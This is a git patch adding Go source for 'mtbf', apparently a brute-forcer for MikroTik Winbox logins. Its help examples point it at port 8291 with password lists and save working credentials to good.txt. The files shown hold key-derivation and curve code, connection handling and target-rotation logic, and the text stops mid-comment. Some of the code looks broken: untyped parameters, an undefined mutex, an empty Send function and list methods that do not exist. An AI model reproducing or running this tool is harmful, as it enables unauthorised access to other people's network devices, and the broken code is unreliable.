From b76c6dda70ab5405478224e5edce24fc3d64e78b Mon Sep 17 00:00:00 2001 From: dave Date: Thu, 17 Nov 2022 23:28:16 +0300 Subject: [PATCH] init --- .gitignore | 11 + bigint.go | 139 +++++++++++ config.go | 343 +++++++++++++++++++++++++++ conn.go | 51 ++++ crypt.go | 103 +++++++++ curve.go | 103 +++++++++ endpoint.go | 587 +++++++++++++++++++++++++++++++++++++++++++++++ go.mod | 5 + go.sum | 2 + legacy-winbox.go | 439 +++++++++++++++++++++++++++++++++++ log.go | 91 ++++++++ math.go | 132 +++++++++++ mtbf.go | 16 ++ point.go | 384 +++++++++++++++++++++++++++++++ results.go | 46 ++++ service.go | 29 +++ source.go | 288 +++++++++++++++++++++++ task.go | 285 +++++++++++++++++++++++ thread.go | 112 +++++++++ winbox.go | 193 ++++++++++++++++ 20 files changed, 3359 insertions(+) create mode 100644 .gitignore create mode 100644 bigint.go create mode 100644 config.go create mode 100644 conn.go create mode 100644 crypt.go create mode 100644 curve.go create mode 100644 endpoint.go create mode 100644 go.mod create mode 100644 go.sum create mode 100644 legacy-winbox.go create mode 100644 log.go create mode 100644 math.go create mode 100644 mtbf.go create mode 100644 point.go create mode 100644 results.go create mode 100644 service.go create mode 100644 source.go create mode 100644 task.go create mode 100644 thread.go create mode 100644 winbox.go diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b31c463 --- /dev/null +++ b/.gitignore @@ -0,0 +1,11 @@ +* + +!/.gitignore +!*.go +!go.sum +!go.mod + +!README.md +!LICENSE + +!*/ diff --git a/bigint.go b/bigint.go new file mode 100644 index 0000000..34bf2b8 --- /dev/null +++ b/bigint.go @@ -0,0 +1,139 @@ +package main + +import ( + "math/big" +) + +type bigint struct { + v *big.Int +} + +func (x bigint) Add(y bigint) bigint { + return bigint{v: new(big.Int).Add(x.v, y.v)} +} +func (x bigint) AddInt(y int) bigint { + return bigint{v: new(big.Int).Add(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Sub(y bigint) bigint { + return bigint{v: new(big.Int).Sub(x.v, y.v)} +} +func (x bigint) SubInt(y int) bigint { + return bigint{v: new(big.Int).Sub(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Mul(y bigint) bigint { + return bigint{v: new(big.Int).Mul(x.v, y.v)} +} +func (x bigint) MulInt(y int) bigint { + return bigint{v: new(big.Int).Mul(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Div(y bigint) bigint { + return bigint{v: new(big.Int).Div(x.v, y.v)} +} +func (x bigint) DivInt(y int) bigint { + return bigint{v: new(big.Int).Div(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Mod(y bigint) bigint { + return bigint{v: new(big.Int).Mod(x.v, y.v)} +} +func (x bigint) ModInt(y int) bigint { + return bigint{v: new(big.Int).Mod(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Pow(y bigint) bigint { + return bigint{v: new(big.Int).Exp(x.v, y.v, nil)} +} +func (x bigint) PowInt(y int) bigint { + return bigint{v: new(big.Int).Exp(x.v, big.NewInt(int64(y)), nil)} +} + +func (x bigint) And(y bigint) bigint { + return bigint{v: new(big.Int).And(x.v, y.v)} +} +func (x bigint) AndInt(y int) bigint { + return bigint{v: new(big.Int).And(x.v, big.NewInt(int64(y)))} +} + +func (x bigint) Neg() bigint { + return bigint{v: new(big.Int).Neg(x.v)} +} + +func (x bigint) Empty() bool { + return x.v == nil || x.v.Sign() == 0 +} + +func (x bigint) ModExp(y, m bigint) bigint { + return bigint{v: new(big.Int).Exp(x.v, y.v, m.v)} +} + +func (x bigint) Eq(y bigint) bool { + return x.v.Cmp(y.v) == 0 +} +func (x bigint) EqInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) == 0 +} + +func (x bigint) Ne(y bigint) bool { + return x.v.Cmp(y.v) != 0 +} +func (x bigint) NeInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) != 0 +} + +func (x bigint) Lt(y bigint) bool { + return x.v.Cmp(y.v) < 0 +} +func (x bigint) LtInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) < 0 +} + +func (x bigint) Gt(y bigint) bool { + return x.v.Cmp(y.v) > 0 +} +func (x bigint) GtInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) > 0 +} + +func (x bigint) Lte(y bigint) bool { + return x.v.Cmp(y.v) <= 0 +} +func (x bigint) LteInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) <= 0 +} + +func (x bigint) Gte(y bigint) bool { + return x.v.Cmp(y.v) >= 0 +} +func (x bigint) GteInt(y int) bool { + return x.v.Cmp(big.NewInt(int64(y))) >= 0 +} + +func (x bigint) ToBytes(n int) []byte { + res := make([]byte, n) + return x.v.FillBytes(res) +} + +func NewBigint(x int) bigint { + bi := bigint{} + bi.v = big.NewInt(int64(x)) + return bi +} + +func NewEmptyBigint() bigint { + return bigint{v: nil} +} + +func NewBigintFromString(s string, p int) bigint { + bi := bigint{} + bi.v, _ = new(big.Int).SetString(s, p) + return bi +} + +func NewBigintFromBytes(b []byte) bigint { + bi := bigint{} + bi.v = new(big.Int).SetBytes(b) + return bi +} diff --git a/config.go b/config.go new file mode 100644 index 0000000..0f3d20e --- /dev/null +++ b/config.go @@ -0,0 +1,343 @@ +package main + +import ( + "os" + "sort" + "strconv" + "strings" + "time" +) + +// ConfigParameterOptions represents additional options for a ConfigParameter. +type ConfigParameterOptions struct { + sw, hidden, command bool + callback func() +} + +// ConfigParameter represents a single configuration parameter. +type ConfigParameter struct { + name string // duplicated in configMap, but also saved here for convenience + value, def interface{} // value and default value + description string // description for this parameter + parsed bool // true if it was successfully parsed from commandline + opts ConfigParameterOptions +} + +var configMap map[string]ConfigParameter = make(map[string]ConfigParameter, 16) +var configAliasMap map[string]string = make(map[string]string, 4) + +var ConfigParsingFinished bool = false + +// registration + +func genericRegister(name string, def interface{}, description string, opts ConfigParameterOptions) { + name = strings.ToLower(name) + + _, ok := configMap[name] + failIf(ok, "cannot register config parameter (already exists): \"%v\"", name) + + _, ok = configAliasMap[name] + failIf(ok, "cannot register config parameter (already exists as an alias): \"%v\"", name) + + failIf(opts.command && opts.callback == nil, "\"%v\" is defined as a command but callback is missing", name) + + p := ConfigParameter{} + p.name = name + p.value = def + p.def = def + p.description = description + p.opts = opts + + configMap[name] = p +} + +func CfgRegister(name string, def interface{}, description string) { + genericRegister(name, def, description, ConfigParameterOptions{}) +} + +func CfgRegisterEx(name string, def interface{}, description string, options ConfigParameterOptions) { + genericRegister(name, def, description, options) +} + +func CfgRegisterCallback(name string, def interface{}, description string, callback func()) { + genericRegister(name, def, description, ConfigParameterOptions{callback: callback}) +} + +func CfgRegisterCommand(name string, description string, callback func()) { + genericRegister(name, false, description, ConfigParameterOptions{command: true, callback: callback}) +} + +func CfgRegisterSwitch(name string, description string) { + genericRegister(name, false, description, ConfigParameterOptions{sw: true}) +} + +func CfgRegisterHidden(name string, def interface{}) { + genericRegister(name, def, "", ConfigParameterOptions{hidden: true}) +} + +func CfgRegisterAlias(alias, target string) { + alias, target = strings.ToLower(alias), strings.ToLower(target) + + _, ok := configAliasMap[alias] + failIf(ok, "cannot register alias (already exists): \"%v\"", alias) + + _, ok = configMap[alias] + failIf(ok, "cannot register alias (already exists as a config parameter): \"%v\"", alias) + + _, ok = configMap[target] + failIf(!ok, "cannot register alias \"%v\": target \"%v\" does not exist", alias, target) + + configAliasMap[alias] = target +} + +// acquisition + +func CfgGet(name string) interface{} { + name = strings.ToLower(name) + parm, ok := configMap[name] + failIf(!ok, "unknown config parameter: \"%v\"", name) + + if parm.opts.sw { + return parm.parsed // switches always return true if they were parsed + } else if parm.parsed || parm.opts.hidden { + return parm.value // parsed and hidden parms return their current value + } else { + return parm.def // otherwise, use default value + } +} + +func CfgGetInt(name string) int { + return CfgGet(name).(int) +} + +func CfgGetFloat(name string) float64 { + return CfgGet(name).(float64) +} + +func CfgGetIntSlice(name string) []int { + return CfgGet(name).([]int) +} + +func CfgGetBool(name string) bool { + return CfgGet(name).(bool) +} + +func CfgGetSwitch(name string) bool { + return CfgGet(name).(bool) +} + +func CfgGetString(name string) string { + return CfgGet(name).(string) +} + +func CfgGetStringSlice(name string) []string { + return CfgGet(name).([]string) +} + +func CfgGetDurationMS(name string) time.Duration { + tm := CfgGet(name).(int) + failIf(tm < -1, "\"%v\" can only be set to -1 or a positive value", name) + if tm == -1 { + tm = 0 + } + + return time.Duration(tm) * time.Millisecond +} + +// setting + +func CfgSet(name string, value interface{}) { + name = strings.ToLower(name) + parm, ok := configMap[name] + failIf(!ok, "unknown config parameter: \"%v\"", name) + failIf(!parm.opts.hidden, "tried to set \"%v\", but it is not a hidden parameter", name) + + parm.value = value + if parm.opts.callback != nil { + parm.opts.callback() + } + + configMap[name] = parm +} + +// parsing + +// getCmdlineParm returns a trimmed commandline parameter with specified index. +func getCmdlineParm(i int) string { + return strings.TrimSpace(os.Args[i]) +} + +// isSlice checks if a ConfigParameter value is a slice. +func (parm *ConfigParameter) isSlice() bool { + switch parm.value.(type) { + case []int, []uint, []string: + return true + default: + return false + } +} + +// writeParmValue saves raw commandline value into a ConfigParameter. +func (parm *ConfigParameter) writeParmValue(value string) { + var err error + + switch parm.value.(type) { + case bool: + parm.value, err = strconv.ParseBool(value) + failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + case int: + v, err := strconv.ParseInt(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.value = int(v) + case uint: + v, err := strconv.ParseUint(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.value = uint(v) + case string: + parm.value = value + case []bool: + b, err := strconv.ParseBool(value) + failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + parm.value = append(parm.value.([]bool), b) + case []int: + i, err := strconv.ParseInt(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.value = append(parm.value.([]int), int(i)) + case []uint: + u, err := strconv.ParseUint(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.value = append(parm.value.([]uint), uint(u)) + case []string: + parm.value = append(parm.value.([]string), value) + default: + fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value) + } +} + +// finalizeParm marks a ConfigParameter as parsed, adds it to a global config map +// and calls its callback, if one is present. +func (parm *ConfigParameter) finalizeParm() { + parm.parsed = true + configMap[parm.name] = *parm + + if parm.opts.callback != nil { + parm.opts.callback() + } + + log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value, parm.name, parm.def, parm.value) +} + +func parseAppConfig() { + log("cfg", 1, "parsing config") + + totalFinalized := 0 + + for i := 1; i < len(os.Args); i++ { + arg := getCmdlineParm(i) + if len(arg) == 0 { + continue + } + + failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg) + arg = strings.TrimPrefix(arg, "-") + arg = strings.TrimPrefix(arg, "-") + + failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) + + parm, ok := configMap[strings.ToLower(arg)] + if !ok { + alias, ok := configAliasMap[strings.ToLower(arg)] + failIf(!ok, "unknown commandline parameter: \"%v\"", arg) + + parm, ok = configMap[alias] + failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg) + + log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias, parm.name) + } + + failIf(parm.opts.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) + failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed", parm.name) + + if !parm.opts.command { + if parm.opts.sw { + parm.writeParmValue("true") + } else { + i++ + parm.writeParmValue(getCmdlineParm(i)) + } + } + + finalizeParm(&parm) + totalFinalized++ + } + + log("cfg", 1, "parsed %v commandline parameters", totalFinalized) + ConfigParsingFinished = true +} + +func showHelp() { + log("", 0, "options:") + + parms := make([]string, 0, len(configMap)) + for key := range configMap { + parms = append(parms, key) + } + sort.Strings(parms) + + for _, parmName := range parms { + parm := configMap[parmName] + + if parm.opts.hidden { + continue + } + + header := "-" + parm.name + if len(parm.name) > 1 { + header = "-" + header + } + + aliases := []string{} + for alias, target := range configAliasMap { + if target == parm.name { + if len(alias) == 1 { + aliases = append(aliases, "-"+alias) + } else { + aliases = append(aliases, "--"+alias) + } + break + } + } + + if len(aliases) > 0 { + sort.Strings(aliases) + header = header + " (aliases: " + strings.Join(aliases, ", ") + ")" + } + + header = header + ":" + description := " (description missing)" + if parm.description != "" { + description = " " + parm.description + } + + if parm.opts.command || parm.opts.sw { + log("", 0, "%s\n%s", header, description) + } else { + log("", 0, "%s\n%s\n default: %v", header, description, parm.value) + } + } + + log("", 0, "") + log("", 0, "examples:") + log("", 0, " single target:") + log("", 0, " ./mtbf --ip 127.0.0.1 --port 8291 --login admin --password 12345678 --out-file good.txt") + log("", 0, " multiple targets with multiple passwords:") + log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt") + + os.Exit(0) +} + +func init() { + CfgRegisterCommand("help", "show program usage", showHelp) + CfgRegisterAlias("?", "help") + CfgRegisterAlias("h", "help") +} diff --git a/conn.go b/conn.go new file mode 100644 index 0000000..c7d9352 --- /dev/null +++ b/conn.go @@ -0,0 +1,51 @@ +package main + +import ( + "net" + "time" +) + +// Connection represents a network socket. +type Connection struct { + dialer net.Dialer + socket net.Conn + connectTimeout time.Duration + readTimeout time.Duration + protocol string +} + +// NewConnection creates a Connection object. +func NewConnection() *Connection { + conn := Connection{} + conn.connectTimeout = CfgGetDurationMS("connect-timeout-ms") + conn.readTimeout = CfgGetDurationMS("read-timeout-ms") + conn.protocol = "tcp" + return &conn +} + +// Connect initiates a connection to an Endpoint. +func (conn *Connection) Connect(endpoint *Endpoint) (err error) { + conn.dialer = net.Dialer{Timeout: conn.connectTimeout, KeepAlive: -1} + conn.socket, err = conn.dialer.Dial(conn.protocol, endpoint.String()) + if err != nil { + log("conn", 2, "cannot connect to \"%v\": %v", endpoint, err.Error()) + } + + return err +} + +// SetConnectTimeout sets a custom connect timeout on a Connection. +func (conn *Connection) SetConnectTimeout(timeout time.Duration) { + conn.connectTimeout = timeout +} + +// SetReadTimeout sets a custom read timeout on a Connection. +func (conn *Connection) SetReadTimeout(timeout time.Duration) { + conn.readTimeout = timeout +} + +// Send writes data to a Connection. +func (conn *Connection) Send(data []byte) { + conn.socket.SetReadDeadline(time.Now().Add(conn.readTimeout)) + +} diff --git a/crypt.go b/crypt.go new file mode 100644 index 0000000..1f95d7b --- /dev/null +++ b/crypt.go @@ -0,0 +1,103 @@ +package main + +import ( + "crypto/hmac" + cryptoRand "crypto/rand" + "crypto/sha1" + "crypto/sha256" + mathRand "math/rand" + "strings" +) + +func getSHA1Digest(data []byte) []byte { + array := sha1.Sum(data) + return array[:] +} + +func getSHA2Digest(data []byte) []byte { + array := sha256.Sum256(data) + return array[:] +} + +func HKDF(data []byte) []byte { + h := hmac.New(sha1.New, []byte(strings.Repeat("\x00", 64))) + h.Write(data) + h1 := h.Sum(nil) + h2 := make([]byte, 0) + res := make([]byte, 0) + + for i := 0; i < 2; i++ { + h = hmac.New(sha1.New, h1) + h.Write(h2) + h.Write([]byte{byte(i) + 1}) + h2 = h.Sum(nil) + res = append(res, h2...) + } + + return res[:0x24] +} + +func genStreamKeys(server bool, data []byte) (sendAESKey, sendHMACKey, receiveAESKey, receiveHMACKey []byte) { + const magic2 = "On the client side, this is the send key; on the server side, it is the receive key." + const magic3 = "On the client side, this is the receive key; on the server side, it is the send key." + + var txEnc, rxEnc []byte + + txEnc = append(data, []byte(strings.Repeat("\x00", 40))...) + rxEnc = append(data, []byte(strings.Repeat("\x00", 40))...) + + if server { + txEnc = append(txEnc, magic3...) + rxEnc = append(rxEnc, magic2...) + } else { + txEnc = append(txEnc, magic2...) + rxEnc = append(rxEnc, magic3...) + } + + txEnc = append(txEnc, []byte(strings.Repeat("\xF2", 40))...) + rxEnc = append(rxEnc, []byte(strings.Repeat("\xF2", 40))...) + + txEnc = getSHA1Digest(txEnc)[:16] + rxEnc = getSHA1Digest(rxEnc)[:16] + + sendKey := HKDF(txEnc) + sendAESKey = sendKey[:16] + sendHMACKey = sendKey[16:] + + receiveKey := HKDF(rxEnc) + receiveAESKey = receiveKey[:16] + receiveHMACKey = receiveKey[16:] + + return sendAESKey, sendHMACKey, receiveAESKey, receiveHMACKey +} + +func genPasswordValidatorPriv(username, password string, salt []byte) []byte { + if len(salt) != 16 { + panic("salt must be 16 bytes") + } + + hash := getSHA2Digest([]byte(username + ":" + password)) + return getSHA2Digest(append(salt, hash...)) +} + +func genRandomBytes(n int) ([]byte, error) { + b := make([]byte, n) + + var err error + if CfgGetSwitch("crypt-predictable-rng") { + _, err = mathRand.Read(b) + } else { + _, err = cryptoRand.Read(b) + } + + if err != nil { + return nil, err + } + + return b, nil +} + +func init() { + CfgRegisterSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng") + mathRand.Seed(300) +} diff --git a/curve.go b/curve.go new file mode 100644 index 0000000..ecac5b6 --- /dev/null +++ b/curve.go @@ -0,0 +1,103 @@ +package main + +type WCurve struct { + p, r, a, b, h bigint + g *JacobiPoint + montA, conversionFromM bigint + conversion bigint +} + +func NewWCurve() *WCurve { + curve := WCurve{} + + curve.p = NewBigintFromString("7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffed", 16) + curve.r = NewBigintFromString("1000000000000000000000000000000014def9dea2f79cd65812631a5cf5d3ed", 16) + curve.montA = NewBigintFromString("486662", 10) + curve.a = NewBigintFromString("2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa984914a144", 16) + curve.b = NewBigintFromString("7b425ed097b425ed097b425ed097b425ed097b425ed097b4260b5e9c7710c864", 16) + curve.h = NewBigintFromString("8", 10) + + curve.conversionFromM = curve.montA.Mul(modinv(NewBigint(3), curve.p)).Mod(curve.p) + curve.conversion = curve.p.Sub(curve.montA.Mul(modinv(NewBigint(3), curve.p))).Mod(curve.p) + curve.g = curve.liftX(NewBigint(9), false) + return &curve +} + +func (curve *WCurve) Eq(other *WCurve) bool { + return curve.p.Eq(other.p) && + curve.a.Mod(curve.p).Eq(other.a.Mod(curve.p)) && + curve.b.Mod(curve.p).Eq(other.b.Mod(curve.p)) +} + +func (curve *WCurve) containsPoint(x, y bigint) bool { + p1 := x.Mul(x).Add(curve.a).Mul(x).Add(curve.b) + return y.Mul(y).Sub(p1).Mod(curve.p).EqInt(0) +} + +func (curve *WCurve) genPublicKey(priv []byte) (pub []byte, parity bool) { + if len(priv) != 32 { + panic("invalid private key length") + } + + p := NewBigintFromBytes(priv) + pt := curve.g.Mul(p) + return curve.toMontgomery(pt) +} + +func (self *WCurve) toMontgomery(pt *JacobiPoint) (bytes []byte, parity bool) { + x := pt.AffineX().Add(self.conversion).Mod(self.p) + return x.ToBytes(32), pt.AffineY().AndInt(1).EqInt(1) +} + +func (self *WCurve) liftX(x bigint, parity bool) *JacobiPoint { + x = x.Mod(self.p) + ySquared := x.Mul(x).Mul(x).Add(self.montA.Mul(x).Mul(x).Add(x)).Mod(self.p) + x = x.Add(self.conversionFromM).Mod(self.p) + ys0, ys1 := primeModSqrt(ySquared, self.p) + if ys0.Empty() && ys1.Empty() { + return nil + } else { + pt1 := NewJacobiPoint(self, x, ys0, NewBigint(1), self.r) + pt2 := NewJacobiPoint(self, x, ys1, NewBigint(1), self.r) + + if pt1.AffineY().AndInt(1).EqInt(1) && parity { + return pt1 + } else if pt2.AffineY().AndInt(1).EqInt(1) && parity { + return pt2 + } else if pt1.AffineY().AndInt(1).EqInt(0) && !parity { + return pt1 + } else { + return pt2 + } + } +} + +func (self *WCurve) redp1(bytes []byte, parity bool) *JacobiPoint { + x := getSHA2Digest(bytes) + for { + x2 := getSHA2Digest(x) + pt := self.liftX(NewBigintFromBytes(x2), parity) + if pt == nil { + x = NewBigintFromBytes(x).AddInt(1).ToBytes(32) + } else { + return pt + } + } +} + +func (self *WCurve) check(a *JacobiPoint) bool { + ax := a.AffineX() + ay := a.AffineY() + + left := ay.Mul(ay).Mod(self.p) + right := ax.Mul(ax).Mul(ax).Add(self.a.Mul(ax)).Add(self.b).Mod(self.p) + return left.Eq(right) +} + +func (self *WCurve) multiplyByG(a bigint) *JacobiPoint { + return self.g.Mul(a) +} + +func (self *WCurve) finiteFieldValue(a bigint) bigint { + return a.Mod(self.r) +} diff --git a/endpoint.go b/endpoint.go new file mode 100644 index 0000000..9a16963 --- /dev/null +++ b/endpoint.go @@ -0,0 +1,587 @@ +package main + +import ( + "container/list" + "errors" + "net" + "strconv" + "strings" + "sync" + "time" +) + +type Address struct { + ip string // TODO: switch to a static 16-byte array + port int + v6 bool +} + +type Endpoint struct { + addr Address + + loginPos SourcePos + passwordPos SourcePos + + delayUntil time.Time + + normalList *list.Element + delayedList *list.Element + + goodConn int + badConn int + consecutiveGoodConn int + consecutiveBadConn int + protoErrors int + consecutiveProtoErrors int + readErrors int + consecutiveReadErrors int + + mutex sync.Mutex + + deleted bool // set to TRUE to mark this endpoint as deleted + + // unused, for now + rtt float32 + heuristicBanAPS int + heuristicBanPPS int + lastPacketAt time.Time // when was the last packet sent? + lastAttemptAt time.Time // same, but for attempts +} + +var endpoints *list.List // Contains all active endpoints +var delayedEndpoints *list.List // Contains endpoints that got delayed + +// A mutex for synchronizing Endpoint collections. +var globalEndpointMutex sync.Mutex + + +// String transforms an Endpoint to a string representation compatible with Dialer interface. +func (e *Endpoint) String() string { + if e.addr.v6 { + return "[" + e.addr.ip + "]:" + strconv.Itoa(e.addr.port) + } else { + return e.addr.ip + ":" + strconv.Itoa(e.addr.port) + } +} + + +// Delete deletes an endpoint from global storage. +// This method assumes that Endpoint's mutex was already taken. +func (e *Endpoint) Delete() { + globalEndpointMutex.Lock() + defer globalEndpointMutex.Unlock() + + e.delayUntil = time.Time{} + + if e.delayedList != nil { + log("ep", 3, "deleting delayed endpoint \"%v\"", e) + delayedEndpoints.Remove(e.delayedList) + e.delayedList = nil + } + + if e.normalList != nil { + log("ep", 3, "deleting endpoint \"%v\"", e) + endpoints.Remove(e.normalList) + e.normalList = nil + } + + e.deleted = true +} + +// Delay marks an Endpoint as "delayed" with the specified time duration +// and causes it to move to the delayed queue. +// This method assumes that Endpoint's mutex was already taken. +func (e *Endpoint) Delay(addTime time.Duration) { + if e.deleted { + return + } + + log("ep", 5, "delaying endpoint \"%v\" for %v", e, addTime) + e.delayUntil = time.Now().Add(addTime) + e.MigrateToDelayed() +} + +// MigrateToDelayed moves an Endpoint to a delayed queue. +// Endpoint mutex is assumed to be taken. +func (e *Endpoint) MigrateToDelayed() { + endpointMutex.Lock() + defer endpointMutex.Unlock() + + if e.delayedList != nil { + // already in a delayed list + log("ep", 5, "cannot migrate endpoint \"%v\" to delayed list: already in the list", e) + } else { + log("ep", 5, "migrating endpoint \"%v\" to delayed list", e) + e.delayedList = delayedEndpoints.PushBack(e) + if e.normalList != nil { + endpoints.Remove(e.normalList) + e.normalList = nil + } + } +} + +// MigrateToNormal moves an Endpoint to a normal queue. +// Endpoint mutex is assumed to be taken. +func (e *Endpoint) MigrateToNormal() { + endpointMutex.Lock() + defer endpointMutex.Unlock() + + if e.normalList != nil { + log("ep", 5, "cannot migrate endpoint \"%v\" to normal list: already in the list", e) + } else { + log("ep", 5, "migrating endpoint \"%v\" to normal list", e) + e.normalList = endpoints.PushBack(e) + if e.delayedList != nil { + delayedEndpoints.Remove(e.delayedList) + e.delayedList = nil + } + } +} + +// SkipLogin gets the endpoint's current login, +// compares it with user-defined login and skips (advances) it if +// both logins are equal. +func (e *Endpoint) SkipLogin(login) { + // attempt to fetch next login + curLogin, empty := SrcLogin.FetchOne(&e.loginPos, false) + if curLogin == login && !empty { // this login has not yet been exhausted? + // reset password pos + e.passwordPos.Reset() + + // fetch but ignore result + SrcLogin.FetchOne(&e.loginPos, true) + + log("ep", 3, "advanced to next login for \"%v\"", e) + } +} + +// NoResponse is an event handler that gets called when +// an Endpoint does not respond to a connection request. +func (e *Endpoint) NoResponse() bool { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.badConn++ + if e.consecutiveGoodConn == 0 { + e.consecutiveBadConn++ + } else { + e.consecutiveGoodConn = 0 + e.consecutiveBadConn = 1 + } + + // 1. always bail after X consecutive bad conns + if e.consecutiveBadConn >= CfgGetInt("max-bad-conn") { + log("ep", 3, "deleting \"%v\" due to max-bad-conn", e) + e.Delete() + return false + } + + // 2. after a good conn, always allow at most X bad conns + if e.goodConn > 0 && e.consecutiveBadConn <= CfgGetInt("max-bad-after-good-conn") { + log("ep", 3, "keeping \"%v\" around due to max-bad-after-good-conn", e) + e.Delay(CfgGetDurationMS("no-response-delay-ms")) + return true + } + + // 3. always allow at most X bad conns + if e.consecutiveBadConn < CfgGetInt("min-bad-conn") { + log("ep", 3, "keeping \"%v\" around due to min-bad-conn", e) + e.Delay(CfgGetDurationMS("no-response-delay-ms")) + return true + } + + // 4. bad conn/good conn ratio must not be higher than X + if e.goodConn > 0 && (float64(e.badConn)/float64(e.goodConn)) <= CfgGetFloat("conn-ratio") { + log("ep", 3, "keeping \"%v\" around due to conn-ratio", e) + e.Delay(CfgGetDurationMS("no-response-delay-ms")) + return true + } + + // otherwise, just delete it + log("ep", 3, "deleting \"%v\" due to no applicable grace conditions", e) + e.Delete() + return false +} + +// ProtocolError is an event handler that gets called when +// an Endpoint responds with wrong or missing data. +func (e *Endpoint) ProtocolError() bool { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.protoErrors++ + e.consecutiveProtoErrors++ + + // 1. always bail after X consecutive protocol errors + if e.consecutiveProtoErrors >= CfgGetInt("max-proto-errors") { + log("ep", 3, "deleting \"%v\" due to max-proto-errors", e) + e.Delete() + return false + } + + // 2. always allow at most X consecutive protocol errors + if e.consecutiveProtoErrors < CfgGetInt("min-proto-errors") { + log("ep", 3, "keeping \"%v\" around due to min-proto-errors", e) + e.Delay(CfgGetDurationMS("protocol-error-delay-ms")) + return true + } + + // 3. bad conn/good conn ratio must not be higher than X + if e.goodConn > 0 && (float64(e.protoErrors)/float64(e.goodConn)) <= CfgGetFloat("proto-error-ratio") { + log("ep", 3, "keeping \"%v\" around due to proto-error-ratio", e) + e.Delay(CfgGetDurationMS("protocol-error-delay-ms")) + return true + } + + // otherwise, just delete it + log("ep", 3, "deleting \"%v\" due to no applicable grace conditions", e) + e.Delete() + return false +} + +// Bad is an event handler that gets called when +// an authentication attempt to an Endpoint fails. +func (e *Endpoint) Bad() { + e.mutex.Lock() + defer e.mutex.Unlock() + e.consecutiveProtoErrors = 0 + + // The endpoint may be in delayed queue, so push it back to the normal queue. + e.MigrateToNormal() +} + +// Good is an event handler that gets called when +// an authentication attempt to an Endpoint succeeds. +func (e *Endpoint) Good(login) { + e.mutex.Lock() + defer e.mutex.Unlock() + e.consecutiveProtoErrors = 0 + + if !CfgGetSwitch("keep-endpoint-on-good") { + e.Delete() + } else { + e.MigrateToNormal() + e.SkipLogin(login) + } +} + +// Connected is an event handler that gets called when +// a connection attempt to an Endpoint succeeds. +func (e *Endpoint) Connected() { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.goodConn++ + if e.consecutiveBadConn == 0 { + e.consecutiveGoodConn++ + } else { + e.consecutiveBadConn = 0 + e.consecutiveGoodConn = 1 + } +} + +// NoSuchLogin is an event handler that gets called when +// a service module determines that a login does not present +// on an Endpoint and therefore can be excluded from processing. +func (e *Endpoint) NoSuchLogin(login string) { + e.mutex.Lock() + defer e.mutex.Unlock() + + e.SkipLogin(login) +} + +// EventWithParm tells an Endpoint that something important has happened, +// or a hint has been acquired. +// It is normally called from a Task handler. +// Returns False if an event resulted in a deletion of its Endpoint. +func (e *Endpoint) EventWithParm(event TaskEvent, parm any) bool { + log("ep", 4, "endpoint event for \"%v\": %v", e, event) + + if event == TE_Generic { + return true // do not process generic events + } + + switch event { + case TE_NoResponse: + return e.NoResponse() + + case TE_ProtocolError: + return e.ProtocolError() + + case TE_Good: + e.Good(parm.(string)) + return false + + case TE_Bad: + e.Bad() + case TN_Connected: + e.Connected() + case TH_NoSuchLogin: + e.NoSuchLogin(parm.(string)) + } + + return true // keep this endpoint +} + +// Event is a parameterless version of EventWithParm. +func (e *Endpoint) Event(event TaskEvent) bool { + return e.EventWithParm(event, 0) +} + +// Exhausted gets called when an endpoint no longer has any valid logins and passwords, +// thus it may be deleted. +func (e *Endpoint) Exhausted() { + e.mutex.Lock() + defer e.mutex.Unlock() + e.Delete() +} + +// GetDelayedEndpoint retrieves an Endpoint from the delayed list. +func GetDelayedEndpoint() (e *Endpoint, waitTime time.Duration) { + currentTime := time.Now() + + if delayedEndpoints.Empty() { + log("ep", 5, "delayed endpoint list is empty") + return nil, 0 + } + + it := delayedEndpoints.IteratorAt(delayedEndpoints.Left()) + for { + k, v := it.Key().(time.Time), it.Value().(*Endpoint) + + if v == nil { + log("ep", 5, "!!! empty delayed endpoint!!!") + return nil, 0 + } + + if k.After(currentTime) { + log("ep", 5, "no delayed endpoints can be processed at this time") + return nil, k.Sub(currentTime) + } + + if k.Before(v.delayUntil) { + log("ep", 5, "delayed endpoint was re-delayed: removing lingering definition") + defer delayedEndpoints.Remove(k) + it.Next() + continue + } + + if v.delayUntil.IsZero() { + log("ep", 5, "delayed endpoint is already in normal queue: removing lingering definition") + defer delayedEndpoints.Remove(k) + it.Next() + continue + } + + defer delayedEndpoints.Remove(k) + return v, 0 + } + + log("ep", 5, "delayed endpoint list was holding only lingering definitions and is now empty") + return nil, 0 +} + +// FetchEndpoint retrieves an endpoint: first, a delayed RB tree is queried, 